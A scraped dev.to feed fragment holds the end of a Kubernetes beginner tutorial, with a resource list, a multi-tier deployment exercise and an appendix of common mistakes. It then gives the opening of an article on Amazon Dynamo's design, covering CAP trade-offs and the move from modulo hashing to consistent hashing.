&lt;td&gt;&lt;a href="https://kubernetes.io/docs/home/" rel="noopener noreferrer"&gt;kubernetes.io/docs&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Interactive Tutorial (browser, no setup needed)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://kubernetes.io/docs/tutorials/kubernetes-basics/" rel="noopener noreferrer"&gt;kubernetes.io/docs/tutorials&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;KodeKloud (video + interactive labs)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://kodekloud.com/" rel="noopener noreferrer"&gt;kodekloud.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CNCF Landscape (ecosystem map)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://landscape.cncf.io/" rel="noopener noreferrer"&gt;landscape.cncf.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes the Hard Way&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/kelseyhightower/kubernetes-the-hard-way" rel="noopener noreferrer"&gt;github.com/kelseyhightower&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Play with Kubernetes (browser-based cluster)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://labs.play-with-k8s.com/" rel="noopener noreferrer"&gt;labs.play-with-k8s.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CKA Exam (Certified Kubernetes Administrator)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.cncf.io/training/certification/#cka" rel="noopener noreferrer"&gt;cncf.io/training/certification/#cka&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Final Exercise: Deploy a Multi-Tier App
&lt;/h2&gt;

&lt;p&gt;Try deploying a simple app with a frontend and a backend. Here's your challenge:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Create a Namespace called &lt;code&gt;my-project&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Deploy nginx as your "frontend" with 2 replicas in that namespace&lt;/li&gt;
&lt;li&gt;Deploy &lt;code&gt;kennethreitz/httpbin&lt;/code&gt; as your "backend" with 2 replicas&lt;/li&gt;
&lt;li&gt;Create ClusterIP Services for both&lt;/li&gt;
&lt;li&gt;Enable the nginx Ingress controller and create an Ingress that routes &lt;code&gt;/&lt;/code&gt; to frontend and &lt;code&gt;/api&lt;/code&gt; to backend&lt;/li&gt;
&lt;li&gt;Add a ConfigMap with a custom environment variable and reference it in the backend Deployment&lt;/li&gt;
&lt;li&gt;Set resource requests and limits on both Deployments&lt;/li&gt;
&lt;li&gt;Add a readiness probe to both Deployments&lt;/li&gt;
&lt;li&gt;Scale the frontend to 4 replicas&lt;/li&gt;
&lt;li&gt;Trigger a rolling update on the frontend (change image to &lt;code&gt;nginx:alpine&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Roll it back&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This covers: Namespaces, Deployments, Services, Ingress, ConfigMaps, Resource Management, Health Probes, Scaling, Rolling Updates, and Rollbacks — everything from this series!&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Appendix — Common Beginner Mistakes
&lt;/h2&gt;

&lt;p&gt;These mistakes are extremely common. Knowing them in advance will save you hours of debugging.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Hardcoding Pod IPs
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Connecting to a Pod by its IP address directly.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; Pod IPs change every time a Pod is rescheduled or restarted.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Always use a Service name. Use DNS: &lt;code&gt;http://my-service&lt;/code&gt; or &lt;code&gt;http://my-service.my-namespace&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Using NodePort in Production
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Exposing apps via NodePort for production traffic.&lt;br&gt;
&lt;strong&gt;Why it's wrong:&lt;/strong&gt; It opens a port on every node, bypasses cloud load balancer health checks, and doesn't scale well.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Use LoadBalancer Services or an Ingress with a LoadBalancer-type controller.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Not Setting Resource Requests
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Deploying Pods with no &lt;code&gt;resources.requests&lt;/code&gt; defined.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; The scheduler has no data to place Pods correctly. Nodes can become overloaded, causing unpredictable OOMKills and CPU starvation across the cluster.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Always set both &lt;code&gt;requests&lt;/code&gt; and &lt;code&gt;limits&lt;/code&gt;. Start conservative and tune based on observed usage.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Running Databases in Deployments
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Using a Deployment for stateful apps like PostgreSQL or MySQL.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; Deployments don't guarantee stable Pod names, stable network identity, or ordered startup/shutdown — all of which clustered databases depend on.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Use StatefulSets for any stateful workload that requires identity or ordered operations.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Not Setting Readiness Probes
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Deploying apps with no readiness probe.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; Kubernetes sends traffic to a Pod the moment the container starts — even before your app has finished initializing. Users hit errors during startup and rolling updates.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Add a readiness probe that checks your app's actual health endpoint before traffic is sent to it.&lt;/p&gt;

&lt;h3&gt;
  
  
  6. Storing Secrets in Git or ConfigMaps
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Committing Secret YAML with real values to source control, or storing passwords in ConfigMaps.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; Secrets in git are compromised forever. ConfigMaps have no access controls.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Use &lt;code&gt;kubectl create secret&lt;/code&gt; from CI/CD pipelines, or a secrets management tool like Vault or Sealed Secrets.&lt;/p&gt;

&lt;h3&gt;
  
  
  7. Using &lt;code&gt;latest&lt;/code&gt; Image Tags
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Deploying with &lt;code&gt;image: myapp:latest&lt;/code&gt;.&lt;br&gt;
&lt;strong&gt;Why it breaks:&lt;/strong&gt; &lt;code&gt;latest&lt;/code&gt; is mutable — the same tag can point to different images over time, making rollbacks unreliable and deployments non-deterministic.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Always use immutable, specific version tags like &lt;code&gt;myapp:v1.4.2&lt;/code&gt; or &lt;code&gt;myapp:sha-abc1234&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  8. Ignoring the Events Section
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mistake:&lt;/strong&gt; Only looking at Pod status (&lt;code&gt;Running&lt;/code&gt;, &lt;code&gt;CrashLoopBackOff&lt;/code&gt;) and not reading events.&lt;br&gt;
&lt;strong&gt;Why it slows you down:&lt;/strong&gt; Events are where Kubernetes tells you &lt;em&gt;why&lt;/em&gt; something failed — image pull errors, OOMKills, failed scheduling, volume mount failures.&lt;br&gt;
&lt;strong&gt;Fix:&lt;/strong&gt; Always run &lt;code&gt;kubectl describe pod &amp;lt;name&amp;gt;&lt;/code&gt; and read the Events section at the bottom first when debugging.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Happy orchestrating! 🚢&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;a href="https://notebooklm.google.com/notebook/5b8e1cc6-07fe-420a-ade9-cad8ddee8817" rel="noopener noreferrer"&gt;NotebookLM Link&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>go</category>
      <category>cloud</category>
      <category>devops</category>
    </item>
    <item>
      <title>Understanding Amazon Dynamo: A Deep Dive into Distributed System Design</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Sat, 21 Feb 2026 04:01:05 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/understanding-amazon-dynamo-a-deep-dive-into-distributed-system-design-5a49</link>
      <guid>https://dev.to/piyushjajoo/understanding-amazon-dynamo-a-deep-dive-into-distributed-system-design-5a49</guid>
      <description>&lt;p&gt;&lt;em&gt;A senior engineer's perspective on building highly available distributed systems&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Introduction: Why Dynamo Changed Everything&lt;/li&gt;
&lt;li&gt;The CAP Theorem Trade-off&lt;/li&gt;
&lt;li&gt;
Core Architecture Components

&lt;ul&gt;
&lt;li&gt;Consistent Hashing for Partitioning&lt;/li&gt;
&lt;li&gt;Replication Strategy (N, R, W)&lt;/li&gt;
&lt;li&gt;Vector Clocks for Versioning&lt;/li&gt;
&lt;li&gt;Sloppy Quorum and Hinted Handoff&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Conflict Resolution: The Shopping Cart Problem&lt;/li&gt;
&lt;li&gt;Read and Write Flow&lt;/li&gt;
&lt;li&gt;Merkle Trees for Anti-Entropy&lt;/li&gt;
&lt;li&gt;Membership and Failure Detection&lt;/li&gt;
&lt;li&gt;Performance Characteristics: Real Numbers&lt;/li&gt;
&lt;li&gt;Partitioning Strategy Evolution&lt;/li&gt;
&lt;li&gt;Comparing Dynamo to Modern Systems&lt;/li&gt;
&lt;li&gt;What Dynamo Does NOT Give You&lt;/li&gt;
&lt;li&gt;Practical Implementation Example&lt;/li&gt;
&lt;li&gt;Key Lessons for System Design&lt;/li&gt;
&lt;li&gt;When NOT to Use Dynamo-Style Systems&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;li&gt;Appendix: Design Problems and Approaches&lt;/li&gt;
&lt;/ol&gt;

&lt;blockquote&gt;
&lt;p&gt;This is a long-form reference — every section stands on its own, so feel free to jump directly to whatever is most relevant to you.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction: Why Dynamo Changed Everything
&lt;/h2&gt;

&lt;p&gt;When Amazon published the Dynamo paper in 2007, it wasn't just another academic exercise. It was a battle-tested solution to real problems at massive scale. I remember when I first read this paper—it fundamentally changed how I thought about distributed systems.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamo is a distributed key-value storage system.&lt;/strong&gt; It was designed to support Amazon’s high-traffic services such as the shopping cart and session management systems. There are no secondary indexes, no joins, no relational semantics—just keys and values, with extreme focus on availability and scalability. It does not provide linearizability or global ordering guarantees, even at the highest quorum settings. If your system requires those properties, Dynamo is not the right tool.&lt;/p&gt;

&lt;p&gt;The core problem Amazon faced was simple to state but brutal to solve: &lt;strong&gt;How do you build a storage system that never says "no" to customers?&lt;/strong&gt; When someone tries to add an item to their shopping cart during a network partition or server failure, rejecting that write isn't acceptable. Every lost write is lost revenue and damaged customer trust.&lt;/p&gt;

&lt;h2&gt;
  
  
  The CAP Theorem Trade-off: Why Dynamo Chooses Availability
&lt;/h2&gt;

&lt;p&gt;Before diving into how Dynamo works, you need to understand the fundamental constraint it's designed around.&lt;/p&gt;

&lt;h3&gt;
  
  
  What is CAP Theorem?
&lt;/h3&gt;

&lt;p&gt;The CAP theorem describes a fundamental trade-off in distributed systems: when a network partition occurs, you must choose between consistency and availability. The three properties are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Consistency (C)&lt;/strong&gt;: All nodes see the same data at the same time&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Availability (A)&lt;/strong&gt;: Every request gets a response (success or failure)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Partition Tolerance (P)&lt;/strong&gt;: System continues working despite network failures&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A common shorthand is "pick 2 of 3," but this is an oversimplification. In practice, network partitions are unavoidable at scale, so the real decision is: &lt;strong&gt;when partitions occur (and they will), do you sacrifice consistency or availability?&lt;/strong&gt; That's the actual design choice.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The harsh reality&lt;/strong&gt;: Network partitions WILL happen. Cables get cut, switches fail, datacenters lose connectivity. You can't avoid them, so you must choose: Consistency or Availability?&lt;/p&gt;

&lt;h3&gt;
  
  
  Traditional Databases Choose Consistency
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F76cak8izc7bxpluwefm5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F76cak8izc7bxpluwefm5.png" alt="image" width="800" height="411"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Traditional approach&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Database: "I can't guarantee all replicas are consistent,
           so I'll reject your write to be safe."
Result: Customer sees error, cart is empty
Impact: Lost revenue, poor experience
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Dynamo Chooses Availability
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F38je9jp0bdihea29u9mm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F38je9jp0bdihea29u9mm.png" alt="image" width="800" height="546"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamo's approach&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Dynamo: "I'll accept your write with the replicas I can reach.
         The unreachable replica will catch up later."
Result: Customer sees success, item in cart
Impact: Sale continues, happy customer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Trade-off Visualized
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;When a partition occurs:

Traditional Database: Choose C over A → Sacrifice Availability
- ✓ All replicas always have same data
- ✓ No conflicts to resolve
- ❌ Rejects writes during failures
- ❌ Poor customer experience
- ❌ Lost revenue

Dynamo:              Choose A over C → Sacrifice Strong Consistency
- ✓ Accepts writes even during failures
- ✓ Excellent customer experience
- ✓ No lost revenue
- ❌ Replicas might temporarily disagree
- ❌ Application must handle conflicts
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Real Amazon Example: Black Friday Shopping Cart
&lt;/h3&gt;

&lt;p&gt;Imagine it's Black Friday. Millions of customers are shopping. A network cable gets cut between datacenters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;With traditional database&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Time: 10:00 AM - Network partition occurs
Result: 
- All shopping cart writes fail
- "Service Unavailable" errors
- Customers can't checkout
- Twitter explodes with complaints
- Estimated lost revenue: $100,000+ per minute
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;With Dynamo&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Time: 10:00 AM - Network partition occurs
Result:
- Shopping cart writes continue
- Customers see success
- Some carts might have conflicts (rare)
- Application merges conflicting versions
- Estimated lost revenue: $0
- A few edge cases need conflict resolution (acceptable)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Why This Choice Makes Sense for E-commerce
&lt;/h3&gt;

&lt;p&gt;Amazon did the math:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Cost of rejecting a write&lt;/strong&gt;: Immediate lost sale ($50-200)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cost of accepting a conflicting write&lt;/strong&gt;: Occasionally need to merge shopping carts (rarely happens, easily fixable)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Business decision&lt;/strong&gt;: Accept writes, deal with rare conflicts&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Types of data where Availability &amp;gt; Consistency&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Shopping carts (merge conflicting additions)&lt;/li&gt;
&lt;li&gt;Session data (last-write-wins is fine)&lt;/li&gt;
&lt;li&gt;User preferences (eventual consistency acceptable)&lt;/li&gt;
&lt;li&gt;Best seller lists (approximate is fine)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Types of data where Consistency &amp;gt; Availability&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Bank account balances (can't have conflicting balances)&lt;/li&gt;
&lt;li&gt;Inventory counts (can't oversell)&lt;/li&gt;
&lt;li&gt;Transaction logs (must be ordered)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is why Dynamo isn't for everything—but for Amazon's e-commerce use cases, choosing availability over strong consistency was the right trade-off.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important nuance&lt;/strong&gt;: While Dynamo is often described as an AP system, it's more accurate to call it a &lt;strong&gt;tunable consistency system&lt;/strong&gt;. Depending on your R and W quorum configuration, it can behave closer to CP. The AP label applies to its default/recommended configuration optimized for e-commerce workloads.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Core Architecture Components
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Consistent Hashing for Partitioning
&lt;/h3&gt;

&lt;p&gt;Let me explain this with a concrete example, because consistent hashing is one of those concepts that seems magical until you see it in action.&lt;/p&gt;

&lt;h4&gt;
  
  
  The Problem: Traditional Hash-Based Sharding
&lt;/h4&gt;

&lt;p&gt;Imagine you have 3 servers and want to distribute data across them. The naive approach:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Traditional approach - DON'T DO THIS
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_server&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;num_servers&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;hash_value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;hash_value&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="n"&gt;num_servers&lt;/span&gt;  &lt;span class="c1"&gt;# Modulo operation
&lt;/span&gt;
&lt;span class="c1"&gt;# With 3 servers:
&lt;/span&gt;&lt;span class="nf"&gt;get_server&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_123&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# Returns server 0
&lt;/span&gt;&lt;span class="nf"&gt;get_server&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_456&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# Returns server 1
&lt;/span&gt;&lt;span class="nf"&gt;get_server&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_789&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# Returns server 2
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This works... until you add or remove a server. Let's see what happens when we go from 3 to 4 servers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Before (3 servers):
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_123&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_456&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_789&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;

&lt;span class="c1"&gt;# After (4 servers):
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_123&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="err"&gt;✓&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stayed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_456&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;✓&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stayed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user_789&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="err"&gt;✓&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stayed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# But wait - this is lucky! In reality, most keys MOVE:
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;product_ABC&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;
&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;product_ABC&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="n"&gt;Server&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="err"&gt;✗&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;MOVED&lt;/span&gt;&lt;span class="err"&gt;!&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The disaster&lt;/strong&gt;: When you change the number of servers, nearly ALL your data needs to be redistributed. Imagine moving terabytes of data just to add one server!&lt;/p&gt;

&lt;h4&gt;
  
  
  The Solution: Consistent Hashing
&lt;/h4&gt;

&lt;p&gt;Consistent hashing solves this by treating the hash space as a circle (0 to 2^32 - 1, wrapping around).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Place servers on the ring&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fchzvmjbqxjtebm3gzuus.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fchzvmjbqxjtebm3gzuus.png" alt="image" width="800" height="141"&gt;&lt;/a&gt;&lt;/p&gt;

